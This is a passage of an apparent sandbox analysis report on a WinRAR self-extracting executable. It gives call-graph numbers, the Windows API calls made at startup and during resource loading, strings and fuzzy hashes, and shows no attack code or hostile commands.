7d0e3b SetThreadExecutionState 24603->24587 24604->24603 24607 7c6c31 RaiseException _com_raise_error 24604->24607 24606->24604 24607->24603 24609 7c3bc4 __EH_prolog 24608->24609 24610 7c3bda 24609->24610 24611 7c3bf6 24609->24611 24664 7c138b 74 API calls 24610->24664 24612 7c3e51 24611->24612 24616 7c3c22 24611->24616 24689 7c138b 74 API calls 24612->24689 24615 7c3be5 24615->24591 24616->24615 24639 7d3377 24616->24639 24618 7c3ca3 24619 7c3d2e 24618->24619 24635 7c3c9a 24618->24635 24667 7cd051 24618->24667 24649 7cab1a 24619->24649 24620 7c3c9f 24620->24618 24666 7c20bd 78 API calls 24620->24666 24621 7c3c8f 24665 7c138b 74 API calls 24621->24665 24622 7c3c71 24622->24618 24622->24620 24622->24621 24624 7c3d41 24629 7c3dd7 24624->24629 24630 7c3dc7 24624->24630 24673 7d3020 24629->24673 24653 7c9215 24630->24653 24633 7c3dd5 24633->24635 24682 7c2021 74 API calls 24633->24682 24683 7d2297 24635->24683 24636->24596 24637->24598 24638->24594 24640 7d338c 24639->24640 24642 7d3396 ___std_exception_copy 24639->24642 24690 7c6ca7 75 API calls 24640->24690 24643 7d34c6 24642->24643 24644 7d341c 24642->24644 24648 7d3440 _abort 24642->24648 24692 7e238d RaiseException 24643->24692 24691 7d32aa 75 API calls 3 library calls 24644->24691 24647 7d34f2 24648->24622 24650 7cab28 24649->24650 24652 7cab32 24649->24652 24651 7deb38 8 API calls 24650->24651 24651->24652 24652->24624 24654 7c921f __EH_prolog 24653->24654 24693 7c7c64 24654->24693 24657 7c13ba 78 API calls 24658 7c9231 24657->24658 24696 7cd114 24658->24696 24660 7c928a 24660->24633 24662 7cd114 118 API calls 24663 7c9243 24662->24663 24663->24660 24663->24662 24705 7cd300 97 API calls __InternalCxxFrameHandler 24663->24705 24664->24615 24665->24635 24666->24618 24668 7cd084 24667->24668 24669 7cd072 24667->24669 24707 7c603a 82 API calls 24668->24707 24706 7c603a 82 API calls 24669->24706 24672 7cd07c 24672->24619 24674 7d3052 24673->24674 24677 7d3029 24673->24677 24681 7d3046 24674->24681 24722 7d552f 123 
API calls 2 library calls 24674->24722 24676 7d3048 24721 7d624a 118 API calls 24676->24721 24677->24676 24678 7d303e 24677->24678 24677->24681 24708 7d6cdc 24678->24708 24681->24633 24682->24635 24685 7d22a1 24683->24685 24684 7d22ba 24723 7d0eed 86 API calls 24684->24723 24685->24684 24688 7d22ce 24685->24688 24687 7d22c1 24687->24688 24689->24615 24690->24642 24691->24648 24692->24647 24694 7cb146 GetVersionExW 24693->24694 24695 7c7c69 24694->24695 24695->24657 24702 7cd12a __InternalCxxFrameHandler 24696->24702 24697 7cd29a 24698 7cd2ce 24697->24698 24699 7cd0cb 6 API calls 24697->24699 24700 7d0e08 SetThreadExecutionState RaiseException 24698->24700 24699->24698 24703 7cd291 24700->24703 24701 7d8c8d 103 API calls 24701->24702 24702->24697 24702->24701 24702->24703 24704 7cac05 91 API calls 24702->24704 24703->24663 24704->24702 24705->24663 24706->24672 24707->24672 24709 7d359e 75 API calls 24708->24709 24710 7d6ced __InternalCxxFrameHandler 24709->24710 24711 7cd114 118 API calls 24710->24711 24712 7d70fe 24710->24712 24715 7d11cf 81 API calls 24710->24715 24716 7d3e0b 118 API calls 24710->24716 24717 7d7153 118 API calls 24710->24717 24718 7d0f86 88 API calls 24710->24718 24719 7d390d 98 API calls 24710->24719 24720 7d77ef 123 API calls 24710->24720 24711->24710 24713 7d5202 98 API calls 24712->24713 24714 7d710e __InternalCxxFrameHandler 24713->24714 24714->24681 24715->24710 24716->24710 24717->24710 24718->24710 24719->24710 24720->24710 24721->24681 24722->24681 24723->24687 24724->24418 24725->24418 24726->24416 24728 7c5d2a 24727->24728 24773 7c5c4b 24728->24773 24730 7c5d5d 24732 7c5d95 24730->24732 24778 7cb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24730->24778 24732->24432 24734 7c8186 24733->24734 24735 7c8232 24734->24735 24785 7cbe5e 19 API calls __InternalCxxFrameHandler 24734->24785 24784 7d1fac CharUpperW 24735->24784 24738 7c823b 24738->24435 24740 7c7c22 24739->24740 24741 7c7c5a 24740->24741 24786 7c6e7a 74 API calls 
24740->24786 24741->24446 24743 7c7c52 24787 7c138b 74 API calls 24743->24787 24745->24499 24747 7c9db3 24746->24747 24750 7c9dc2 24746->24750 24748 7c9db9 FlushFileBuffers 24747->24748 24747->24750 24748->24750 24749 7c9e3f SetFileTime 24749->24504 24750->24749 24751->24425 24752->24436 24753->24436 24754->24446 24755->24446 24756->24441 24757->24452 24758->24448 24759->24452 24761 7c98c5 GetFileType 24760->24761 24762 7c8b5a 24760->24762 24761->24762 24762->24469 24763 7c2021 74 API calls 24762->24763 24763->24467 24764->24469 24765->24470 24766->24495 24767->24495 24768->24495 24769->24495 24770->24500 24771->24507 24772->24450 24779 7c5b48 24773->24779 24775 7c5c6c 24775->24730 24777 7c5b48 2 API calls 24777->24775 24778->24730 24781 7c5b52 24779->24781 24780 7c5c3a 24780->24775 24780->24777 24781->24780 24783 7cb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24781->24783 24783->24781 24784->24738 24785->24735 24786->24743 24787->24741 24789->24515 24791 7ca6a8 24790->24791 24792 7ca727 FindNextFileW 24791->24792 24793 7ca6c1 FindFirstFileW 24791->24793 24794 7ca732 GetLastError 24792->24794 24798 7ca709 24792->24798 24795 7ca6d0 24793->24795 24793->24798 24794->24798 24796 7cbb03 GetCurrentDirectoryW 24795->24796 24797 7ca6e0 24796->24797 24799 7ca6fe GetLastError 24797->24799 24800 7ca6e4 FindFirstFileW 24797->24800 24798->24366 24799->24798 24800->24798 24800->24799 24810 7da5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24801->24810 24803 7da5cd 24805 7da5d9 24803->24805 24811 7da605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24803->24811 24805->24079 24805->24080 24806->24083 24807->24089 24808->24089 24809->24092 24810->24803 24811->24805 24812->24098 24814 7c9f42 78 API calls 24813->24814 24815 7c1fe8 24814->24815 24816 7c1a04 101 API calls 24815->24816 24819 7c2005 24815->24819 24817 7c1ff5 24816->24817 24817->24819 24820 7c138b 74 API calls 24817->24820 24819->24106 24819->24107 24820->24819 24822 7db5bc GetDlgItem 24821->24822 24823 7db583 
GetMessageW 24821->24823 24822->24117 24822->24118 24824 7db599 IsDialogMessageW 24823->24824 24825 7db5a8 TranslateMessage DispatchMessageW 24823->24825 24824->24822 24824->24825 24825->24822 24826 7c13e1 84 API calls 2 library calls 25429 7d94e0 GetClientRect 25430 7df2e0 46 API calls __RTC_Initialize 25475 7d21e0 26 API calls std::bad_exception::bad_exception 25431 7ebee0 GetCommandLineA GetCommandLineW 25432 7e0ada 51 API calls 2 library calls 24889 7c10d5 24894 7c5abd 24889->24894 24895 7c5ac7 __EH_prolog 24894->24895 24896 7cb505 84 API calls 24895->24896 24897 7c5ad3 24896->24897 24901 7c5cac GetCurrentProcess GetProcessAffinityMask 24897->24901 24902 7de2d7 24904 7de1db 24902->24904 24903 7de85d ___delayLoadHelper2@8 14 API calls 24903->24904 24904->24903 24905 7de1d1 14 API calls ___delayLoadHelper2@8 25433 7df4d3 20 API calls 25477 7ea3d0 21 API calls 2 library calls 25478 7f2bd0 VariantClear 25437 7d62ca 123 API calls __InternalCxxFrameHandler 25480 7db5c0 100 API calls 25481 7d77c0 118 API calls 25482 7dffc0 RaiseException _com_raise_error _com_error::_com_error 24916 7ddec2 24917 7ddecf 24916->24917 24918 7ce617 53 API calls 24917->24918 24919 7ddedc 24918->24919 24920 7c4092 _swprintf 51 API calls 24919->24920 24921 7ddef1 SetDlgItemTextW 24920->24921 24922 7db568 5 API calls 24921->24922 24923 7ddf0e 24922->24923 25483 7d1bbd GetCPInfo IsDBCSLeadByte 25484 7eb1b8 27 API calls 2 library calls 25485 7db1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24933 7df3b2 24934 7df3be __FrameHandler3::FrameUnwindToState 24933->24934 24965 7deed7 24934->24965 24936 7df3c5 24937 7df518 24936->24937 24940 7df3ef 24936->24940 25038 7df838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24937->25038 24939 7df51f 25031 7e7f58 24939->25031 24951 7df42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24940->24951 24976 7e8aed 24940->24976 24947 7df40e 24949 7df48f 24984 7df953 
GetStartupInfoW _abort 24949->24984 24951->24949 25034 7e7af4 38 API calls _abort 24951->25034 24952 7df495 24985 7e8a3e 51 API calls 24952->24985 24955 7df49d 24986 7ddf1e 24955->24986 24959 7df4b1 24959->24939 24960 7df4b5 24959->24960 24961 7df4be 24960->24961 25036 7e7efb 28 API calls _abort 24960->25036 25037 7df048 12 API calls ___scrt_uninitialize_crt 24961->25037 24964 7df4c6 24964->24947 24966 7deee0 24965->24966 25040 7df654 IsProcessorFeaturePresent 24966->25040 24968 7deeec 25041 7e2a5e 24968->25041 24970 7deef1 24975 7deef5 24970->24975 25049 7e8977 24970->25049 24973 7def0c 24973->24936 24975->24936 24977 7e8b04 24976->24977 24978 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24977->24978 24979 7df408 24978->24979 24979->24947 24980 7e8a91 24979->24980 24981 7e8ac0 24980->24981 24982 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24981->24982 24983 7e8ae9 24982->24983 24983->24951 24984->24952 24985->24955 25100 7d0863 24986->25100 24990 7ddf3d 25149 7dac16 24990->25149 24992 7ddf46 _abort 24993 7ddf59 GetCommandLineW 24992->24993 24994 7ddf68 24993->24994 24995 7ddfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24993->24995 25153 7dc5c4 24994->25153 24996 7c4092 _swprintf 51 API calls 24995->24996 24998 7de04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24996->24998 25164 7db6dd LoadBitmapW 24998->25164 25001 7ddf76 OpenFileMappingW 25005 7ddf8f MapViewOfFile 25001->25005 25006 7ddfd6 CloseHandle 25001->25006 25002 7ddfe0 25158 7ddbde 25002->25158 25008 7ddfcd UnmapViewOfFile 25005->25008 25009 7ddfa0 __InternalCxxFrameHandler 25005->25009 25006->24995 25008->25006 25013 7ddbde 2 API calls 25009->25013 25015 7ddfbc 25013->25015 25014 7d90b7 8 API calls 25016 7de0aa DialogBoxParamW 25014->25016 25015->25008 25017 7de0e4 25016->25017 25018 7de0fd 25017->25018 25019 7de0f6 Sleep 25017->25019 25021 7de10b 25018->25021 25194 7dae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 
25018->25194 25019->25018 25022 7de12a DeleteObject 25021->25022 25023 7de13f DeleteObject 25022->25023 25024 7de146 25022->25024 25023->25024 25025 7de189 25024->25025 25026 7de177 25024->25026 25191 7dac7c 25025->25191 25195 7ddc3b 6 API calls 25026->25195 25029 7de17d CloseHandle 25029->25025 25030 7de1c3 25035 7df993 GetModuleHandleW 25030->25035 25325 7e7cd5 25031->25325 25034->24949 25035->24959 25036->24961 25037->24964 25038->24939 25040->24968 25053 7e3b07 25041->25053 25045 7e2a7a 25045->24970 25046 7e2a6f 25046->25045 25067 7e3b43 DeleteCriticalSection 25046->25067 25048 7e2a67 25048->24970 25096 7ec05a 25049->25096 25052 7e2a7d 7 API calls 2 library calls 25052->24975 25054 7e3b10 25053->25054 25056 7e3b39 25054->25056 25057 7e2a63 25054->25057 25068 7e3d46 25054->25068 25073 7e3b43 DeleteCriticalSection 25056->25073 25057->25048 25059 7e2b8c 25057->25059 25089 7e3c57 25059->25089 25062 7e2ba1 25062->25046 25064 7e2baf 25065 7e2bbc 25064->25065 25095 7e2bbf 6 API calls ___vcrt_FlsFree 25064->25095 25065->25046 25067->25048 25074 7e3c0d 25068->25074 25071 7e3d7e InitializeCriticalSectionAndSpinCount 25072 7e3d69 25071->25072 25072->25054 25073->25057 25075 7e3c26 25074->25075 25076 7e3c4f 25074->25076 25075->25076 25081 7e3b72 25075->25081 25076->25071 25076->25072 25079 7e3c3b GetProcAddress 25079->25076 25080 7e3c49 25079->25080 25080->25076 25082 7e3b7e ___vcrt_FlsFree 25081->25082 25083 7e3bf3 25082->25083 25084 7e3b95 LoadLibraryExW 25082->25084 25088 7e3bd5 LoadLibraryExW 25082->25088 25083->25076 25083->25079 25085 7e3bfa 25084->25085 25086 7e3bb3 GetLastError 25084->25086 25085->25083 25087 7e3c02 FreeLibrary 25085->25087 25086->25082 25087->25083 25088->25082 25088->25085 25090 7e3c0d ___vcrt_FlsFree 5 API calls 25089->25090 25091 7e3c71 25090->25091 25092 7e3c8a TlsAlloc 25091->25092 25093 7e2b96 25091->25093 25093->25062 25094 7e3d08 6 API calls ___vcrt_FlsFree 25093->25094 25094->25064 25095->25062 25097 7ec073 25096->25097 25098 7dfbbc 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25097->25098 25099 7deefe 25098->25099 25099->24973 25099->25052 25101 7dec50 25100->25101 25102 7d086d GetModuleHandleW 25101->25102 25103 7d0888 GetProcAddress 25102->25103 25104 7d08e7 25102->25104 25106 7d08b9 GetProcAddress 25103->25106 25107 7d08a1 25103->25107 25105 7d0c14 GetModuleFileNameW 25104->25105 25205 7e75fb 42 API calls __vsnwprintf_l 25104->25205 25116 7d0c32 25105->25116 25108 7d08cb 25106->25108 25107->25106 25108->25104 25110 7d0b54 25110->25105 25111 7d0b5f GetModuleFileNameW CreateFileW 25110->25111 25112 7d0b8f SetFilePointer 25111->25112 25113 7d0c08 CloseHandle 25111->25113 25112->25113 25114 7d0b9d ReadFile 25112->25114 25113->25105 25114->25113 25118 7d0bbb 25114->25118 25119 7d0c94 GetFileAttributesW 25116->25119 25121 7d0c5d CompareStringW 25116->25121 25122 7d0cac 25116->25122 25196 7cb146 25116->25196 25199 7d081b 25116->25199 25118->25113 25120 7d081b 2 API calls 25118->25120 25119->25116 25119->25122 25120->25118 25121->25116 25123 7d0cb7 25122->25123 25125 7d0cec 25122->25125 25126 7d0cd0 GetFileAttributesW 25123->25126 25127 7d0ce8 25123->25127 25124 7d0dfb 25148 7da64d GetCurrentDirectoryW 25124->25148 25125->25124 25128 7cb146 GetVersionExW 25125->25128 25126->25123 25126->25127 25127->25125 25129 7d0d06 25128->25129 25130 7d0d0d 25129->25130 25131 7d0d73 25129->25131 25133 7d081b 2 API calls 25130->25133 25132 7c4092 _swprintf 51 API calls 25131->25132 25134 7d0d9b AllocConsole 25132->25134 25135 7d0d17 25133->25135 25136 7d0da8 GetCurrentProcessId AttachConsole 25134->25136 25137 7d0df3 ExitProcess 25134->25137 25138 7d081b 2 API calls 25135->25138 25206 7e3e13 25136->25206 25140 7d0d21 25138->25140 25142 7ce617 53 API calls 25140->25142 25141 7d0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25141->25137 25143 7d0d3c 25142->25143 25144 7c4092 _swprintf 51 API calls 25143->25144 25145 7d0d4f 25144->25145 25146 7ce617 53 API calls 25145->25146 25147 7d0d5e 
25146->25147 25147->25137 25148->24990 25150 7d081b 2 API calls 25149->25150 25151 7dac2a OleInitialize 25150->25151 25152 7dac4d GdiplusStartup SHGetMalloc 25151->25152 25152->24992 25157 7dc5ce 25153->25157 25154 7dc6e4 25154->25001 25154->25002 25155 7d1fac CharUpperW 25155->25157 25157->25154 25157->25155 25208 7cf3fa 82 API calls 2 library calls 25157->25208 25159 7dec50 25158->25159 25160 7ddbeb SetEnvironmentVariableW 25159->25160 25162 7ddc0e 25160->25162 25161 7ddc36 25161->24995 25162->25161 25163 7ddc2a SetEnvironmentVariableW 25162->25163 25163->25161 25165 7db6fe 25164->25165 25166 7db70b GetObjectW 25164->25166 25209 7da6c2 FindResourceW 25165->25209 25167 7db71a 25166->25167 25169 7da5c6 4 API calls 25167->25169 25171 7db72d 25169->25171 25172 7db770 25171->25172 25173 7db74c 25171->25173 25174 7da6c2 12 API calls 25171->25174 25183 7cda42 25172->25183 25223 7da605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25173->25223 25176 7db73d 25174->25176 25176->25173 25178 7db743 DeleteObject 25176->25178 25177 7db754 25224 7da5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25177->25224 25178->25173 25180 7db75d 25225 7da80c 8 API calls 25180->25225 25182 7db764 DeleteObject 25182->25172 25234 7cda67 25183->25234 25188 7d90b7 25189 7deb38 8 API calls 25188->25189 25190 7d90d6 25189->25190 25190->25014 25192 7dacab GdiplusShutdown OleUninitialize 25191->25192 25192->25030 25194->25021 25195->25029 25197 7cb15a GetVersionExW 25196->25197 25198 7cb196 25196->25198 25197->25198 25198->25116 25200 7dec50 25199->25200 25201 7d0828 GetSystemDirectoryW 25200->25201 25202 7d085e 25201->25202 25203 7d0840 25201->25203 25202->25116 25204 7d0851 LoadLibraryW 25203->25204 25204->25202 25205->25110 25207 7e3e1b 25206->25207 25207->25141 25207->25207 25208->25157 25210 7da7d3 25209->25210 25211 7da6e5 SizeofResource 25209->25211 25210->25166 25210->25167 25211->25210 25212 7da6fc LoadResource 25211->25212 25212->25210 25213 7da711 LockResource 25212->25213 25213->25210 
25214 7da722 GlobalAlloc 25213->25214 25214->25210 25215 7da73d GlobalLock 25214->25215 25216 7da7cc GlobalFree 25215->25216 25217 7da74c __InternalCxxFrameHandler 25215->25217 25216->25210 25218 7da7c5 GlobalUnlock 25217->25218 25226 7da626 GdipAlloc 25217->25226 25218->25216 25221 7da79a GdipCreateHBITMAPFromBitmap 25222 7da7b0 25221->25222 25222->25218 25223->25177 25224->25180 25225->25182 25227 7da638 25226->25227 25228 7da645 25226->25228 25230 7da3b9 25227->25230 25228->25218 25228->25221 25228->25222 25231 7da3da GdipCreateBitmapFromStreamICM 25230->25231 25232 7da3e1 GdipCreateBitmapFromStream 25230->25232 25233 7da3e6 25231->25233 25232->25233 25233->25228 25235 7cda75 _wcschr __EH_prolog 25234->25235 25236 7cdaa4 GetModuleFileNameW 25235->25236 25237 7cdad5 25235->25237 25238 7cdabe 25236->25238 25280 7c98e0 25237->25280 25238->25237 25240 7cdb31 25291 7e6310 25240->25291 25241 7c959a 80 API calls 25244 7cda4e 25241->25244 25243 7ce261 78 API calls 25246 7cdb05 25243->25246 25278 7ce29e GetModuleHandleW FindResourceW 25244->25278 25245 7cdb44 25247 7e6310 26 API calls 25245->25247 25246->25240 25246->25243 25258 7cdd4a 25246->25258 25255 7cdb56 ___vcrt_FlsFree 25247->25255 25248 7cdc85 25248->25258 25311 7c9d70 81 API calls 25248->25311 25250 7c9e80 79 API calls 25250->25255 25252 7cdc9f ___std_exception_copy 25253 7c9bd0 82 API calls 25252->25253 25252->25258 25256 7cdcc8 ___std_exception_copy 25253->25256 25255->25248 25255->25250 25255->25258 25305 7c9bd0 25255->25305 25310 7c9d70 81 API calls 25255->25310 25256->25258 25275 7cdcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 25256->25275 25312 7d1b84 MultiByteToWideChar 25256->25312 25258->25241 25259 7ce159 25263 7ce1de 25259->25263 25318 7e8cce 26 API calls ___std_exception_copy 25259->25318 25261 7ce16e 25319 7e7625 26 API calls ___std_exception_copy 25261->25319 25264 7ce214 25263->25264 25268 7ce261 78 API calls 25263->25268 25269 7e6310 26 API calls 25264->25269 25266 7ce1c6 25320 7ce27c 78 
API calls 25266->25320 25268->25263 25270 7ce22d 25269->25270 25271 7e6310 26 API calls 25270->25271 25271->25258 25274 7d1da7 WideCharToMultiByte 25274->25275 25275->25258 25275->25259 25275->25274 25313 7ce5b1 50 API calls __vsnprintf 25275->25313 25314 7e6159 26 API calls 3 library calls 25275->25314 25315 7e8cce 26 API calls ___std_exception_copy 25275->25315 25316 7e7625 26 API calls ___std_exception_copy 25275->25316 25317 7ce27c 78 API calls 25275->25317 25279 7cda55 25278->25279 25279->25188 25281 7c98ea 25280->25281 25282 7c994b CreateFileW 25281->25282 25283 7c996c GetLastError 25282->25283 25287 7c99bb 25282->25287 25284 7cbb03 GetCurrentDirectoryW 25283->25284 25285 7c998c 25284->25285 25286 7c9990 CreateFileW GetLastError 25285->25286 25285->25287 25286->25287 25289 7c99b5 25286->25289 25288 7c99ff 25287->25288 25290 7c99e5 SetFileTime 25287->25290 25288->25246 25289->25287 25290->25288 25292 7e6349 25291->25292 25293 7e634d 25292->25293 25304 7e6375 25292->25304 25321 7e91a8 20 API calls _abort 25293->25321 25295 7e6699 25297 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25295->25297 25296 7e6352 25322 7e9087 26 API calls ___std_exception_copy 25296->25322 25299 7e66a6 25297->25299 25299->25245 25300 7e635d 25301 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25300->25301 25303 7e6369 25301->25303 25303->25245 25304->25295 25323 7e6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25304->25323 25307 7c9bdc 25305->25307 25308 7c9be3 25305->25308 25306 7c9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25306->25308 25307->25255 25308->25306 25308->25307 25324 7c6d1a 77 API calls 25308->25324 25310->25255 25311->25252 25312->25275 25313->25275 25314->25275 25315->25275 25316->25275 25317->25275 25318->25261 25319->25266 25320->25263 25321->25296 25322->25300 25323->25304 25324->25308 25326 7e7ce1 _abort 25325->25326 25327 7e7cfa 25326->25327 25328 7e7ce8 
25326->25328 25349 7eac31 EnterCriticalSection 25327->25349 25361 7e7e2f GetModuleHandleW 25328->25361 25331 7e7ced 25331->25327 25362 7e7e73 GetModuleHandleExW 25331->25362 25332 7e7d9f 25350 7e7ddf 25332->25350 25336 7e7d76 25341 7e7d8e 25336->25341 25342 7e8a91 _abort 5 API calls 25336->25342 25338 7e7d01 25338->25332 25338->25336 25370 7e87e0 20 API calls _abort 25338->25370 25339 7e7dbc 25353 7e7dee 25339->25353 25340 7e7de8 25371 7f2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25340->25371 25343 7e8a91 _abort 5 API calls 25341->25343 25342->25341 25343->25332 25349->25338 25372 7eac81 LeaveCriticalSection 25350->25372 25352 7e7db8 25352->25339 25352->25340 25373 7eb076 25353->25373 25356 7e7e1c 25359 7e7e73 _abort 8 API calls 25356->25359 25357 7e7dfc GetPEB 25357->25356 25358 7e7e0c GetCurrentProcess TerminateProcess 25357->25358 25358->25356 25360 7e7e24 ExitProcess 25359->25360 25361->25331 25363 7e7e9d GetProcAddress 25362->25363 25364 7e7ec0 25362->25364 25367 7e7eb2 25363->25367 25365 7e7ecf 25364->25365 25366 7e7ec6 FreeLibrary 25364->25366 25368 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25365->25368 25366->25365 25367->25364 25369 7e7cf9 25368->25369 25369->25327 25370->25336 25372->25352 25374 7eb09b 25373->25374 25378 7eb091 25373->25378 25375 7eac98 _abort 5 API calls 25374->25375 25375->25378 25376 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25377 7e7df8 25376->25377 25377->25356 25377->25357 25378->25376 25488 7c6faa 111 API calls 3 library calls 25489 7deda7 48 API calls _unexpected 25439 7ddca1 DialogBoxParamW 25490 7df3a0 27 API calls 25442 7ea4a0 71 API calls _free 25443 7ea6a0 31 API calls 2 library calls 25444 7f08a0 IsProcessorFeaturePresent 25491 7db18d 78 API calls 25446 7dc793 97 API calls 4 library calls 25448 7dc793 102 API calls 5 library calls 25494 7d9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte

Control-flow Graph

APIs
  • Part of subcall function 007D0863: GetModuleHandleW.KERNEL32(kernel32), ref: 007D087C
  • Part of subcall function 007D0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007D088E
  • Part of subcall function 007D0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007D08BF
  • Part of subcall function 007DA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 007DA655
  • Part of subcall function 007DAC16: OleInitialize.OLE32(00000000), ref: 007DAC2F
  • Part of subcall function 007DAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007DAC66
  • Part of subcall function 007DAC16: SHGetMalloc.SHELL32(00808438), ref: 007DAC70
• GetCommandLineW.KERNEL32 ref: 007DDF5C
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 007DDF83
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 007DDF94
• UnmapViewOfFile.KERNEL32(00000000), ref: 007DDFCE
  • Part of subcall function 007DDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007DDBF4
  • Part of subcall function 007DDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007DDC30
                                                                      • CloseHandle.KERNEL32(00000000), ref: 007DDFD7
                                                                      • GetModuleFileNameW.KERNEL32(00000000,0081EC90,00000800), ref: 007DDFF2
                                                                      • SetEnvironmentVariableW.KERNEL32(sfxname,0081EC90), ref: 007DDFFE
                                                                      • GetLocalTime.KERNEL32(?), ref: 007DE009
                                                                      • _swprintf.LIBCMT ref: 007DE048
                                                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 007DE05A
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 007DE061
                                                                      • LoadIconW.USER32(00000000,00000064), ref: 007DE078
                                                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 007DE0C9
                                                                      • Sleep.KERNEL32(?), ref: 007DE0F7
                                                                      • DeleteObject.GDI32 ref: 007DE130
                                                                      • DeleteObject.GDI32(?), ref: 007DE140
                                                                      • CloseHandle.KERNEL32 ref: 007DE183
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                      • API String ID: 3049964643-2656992072
                                                                      • Opcode ID: 9f42eab27d34eaaa97d055c5b4e6235a8c92eb753bb05b2f32572032f9e89e59
                                                                      • Instruction ID: 68418484a9298de9084fa5364983144e473f2ecf33799da330b9518518a0b2e5
                                                                      • Opcode Fuzzy Hash: 9f42eab27d34eaaa97d055c5b4e6235a8c92eb753bb05b2f32572032f9e89e59
                                                                      • Instruction Fuzzy Hash: BF61C171608609EBD320ABA4EC4DF6B7BBCFB45710F00442BFA45963A1EB7C9944C7A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 888 7da6c2-7da6df FindResourceW 889 7da7db 888->889 890 7da6e5-7da6f6 SizeofResource 888->890 891 7da7dd-7da7e1 889->891 890->889 892 7da6fc-7da70b LoadResource 890->892 892->889 893 7da711-7da71c LockResource 892->893 893->889 894 7da722-7da737 GlobalAlloc 893->894 895 7da73d-7da746 GlobalLock 894->895 896 7da7d3-7da7d9 894->896 897 7da7cc-7da7cd GlobalFree 895->897 898 7da74c-7da76a call 7e0320 895->898 896->891 897->896 902 7da76c-7da78e call 7da626 898->902 903 7da7c5-7da7c6 GlobalUnlock 898->903 902->903 908 7da790-7da798 902->908 903->897 909 7da79a-7da7ae GdipCreateHBITMAPFromBitmap 908->909 910 7da7b3-7da7c1 908->910 909->910 911 7da7b0 909->911 910->903 911->910
                                                                      APIs
                                                                      • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,007DB73D,00000066), ref: 007DA6D5
                                                                      • SizeofResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA6EC
                                                                      • LoadResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA703
                                                                      • LockResource.KERNEL32(00000000,?,?,?,007DB73D,00000066), ref: 007DA712
                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,007DB73D,00000066), ref: 007DA72D
                                                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,?,007DB73D,00000066), ref: 007DA73E
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 007DA7C6
                                                                        • Part of subcall function 007DA626: GdipAlloc.GDIPLUS(00000010), ref: 007DA62C
                                                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 007DA7A7
